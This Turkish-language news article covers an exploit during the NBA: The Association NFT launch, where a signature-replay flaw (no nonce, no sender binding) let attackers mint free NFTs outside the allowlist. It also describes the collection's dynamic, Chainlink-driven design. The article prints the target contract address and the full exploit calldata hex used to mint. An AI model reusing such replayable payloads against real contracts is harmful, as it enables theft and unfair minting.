NBA: The Association NFT’nin yayınlanmasıyla ilgili birtakım sorunlar yaşandı. Web3 ve Ethereum uzmanları, erken sürümler için izin verilenler listesinde olmadan bu ücretsiz NFT’leri oluşturmanıza izin veren hex kodunu keşfetti.
Basitçe söylemek gerekirse, kullanıcılar oluşturdukları her cüzdan için 1 NFT üretebilecek bir yazılımı “döngü” yapabilir veya kullanabilir. Ancak durum gitgide kötüleşiyor, sözleşme birden çok kez duraklatılmış olsa da, bu saldırganlar işlem başına 100 NFT basacak yeni hash’ler oluşturup, işlem maliyetinin yükselmesine neden oldular ve projeyi hızla sattılar.
NBA: The Association NFT koleksiyonunu nasıl kullandı?
The #AssociationNFT contract has a vulnerability. The verify function does not
1) have a nonce so that it can be used only once
2) bind the msg sender with the signer@NBAxNFT
@defiprime pic.twitter.com/NsCsBFo2Yo— BlockSec (@BlockSecTeam) April 21, 2022
Saldırganlar buldukları boşluğu kötüye kullandılar ve hex’i kullanarak aşağıdaki sözleşme adresine 0 ETH göndererek istedikleri kadar basabildiler (ancak bu şu anda çalışmıyor).
Contract address: 0xdd5a649fc076886dfd4b9ad6acfc9b5eb882e83c Hex: 0x8df9da460000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000374a99d809928d2e230e66c1cb985a1ed7032a070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014b230ce30000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000041570921b473b5f3fe583331074ade2b2015132283f7e966101f5da8ca93ca8f20073216a771d2c81fdebf07e0f307aa0e12bfcf42a38df3033b9590b140ecffb51b00000000000000000000000000000000000000000000000000000000000000 Saldırıya rağmen, proje etkilenmiş gibi görünmüyor. Bu ücretsiz NFT’lerin tabanı şu anda yaklaşık 0,3 ETH’de. Saldırganlar mutlu bir şekilde hayatlarına devam ediyorlar, ancak bir sözleşmenin verimsiz hale getirilmesi veya lansman sırasında saldırıya uğraması ne kadar önemli?
Koleksiyon basıldıktan sonra, oyuncular Chainlink VRF kullanılarak rastgele bir şekilde atanacak. Herkesin, 16 Playoff takımından herhangi bir oyuncuyu basmak için adil ve eşit bir şansı olacak. Association NFT koleksiyonu rastgele dağıtılacak, 2022 NBA Playoffs NFT’lerinin alıcıları 22 Nisan’a kadar hangi oyuncuyu alacaklarını bilmeyecek.
Geçtiğimiz günlerde de 182 milyon dolarlık bir soygunla başka bir kripto soygununu ele aldık ve bizce bu işler gitgide kontrolden çıkıyor.
NBA: The Association NFT koleksiyonu nedir?
Association NFT, takımın ve oyuncunun sahadaki başarısına bağlı olarak zaman içinde görünümü değiştiren dinamik bir NFT koleksiyonudur. 2022 NBA Playoffları için toplam 18.000 NFT, oyuncu başına 75 adet üretilecek. Association NFT’leri, Chainlink Oracle aracılığıyla her takım ve oyuncu için gerçek zamanlı veri akışlarına ve hesaplamalara bağlanıyor. Bu, her oyuncunun NFT’sinin görünümünün, Galaxis akıllı sözleşmesine girilen önceden belirlenmiş hedeflere dayalı olarak otomatik bir şekilde değişmesine olanak tanır.
Snoop Dogg Baked Nation NFT koleksiyonu Cardano’da yayınlandı
Bir oyuncu Playofflar boyunca ne kadar başarılı olursa, NFT’lerinde çeşitli sanatçılar tarafından oluşturulan arka planlar, oyuncu aksesuarları ve emojiler gibi daha fazla görsel değişiklik olur. Ayrıca, her oyuncunun NFT’si, oyuncunun sahadaki performansına ve başarılarına bağlı olarak Özellikler ve Aksesuarlar aracılığıyla yükseltilebilir. İlerleme özellikleri, istatistik 1, 2 veya 3+ oyunda elde edilirse değiştirilir. Bu arada Twitter, NBA All-Star Weekend için özel etiketler ve etkinlikler yayınlıyor.
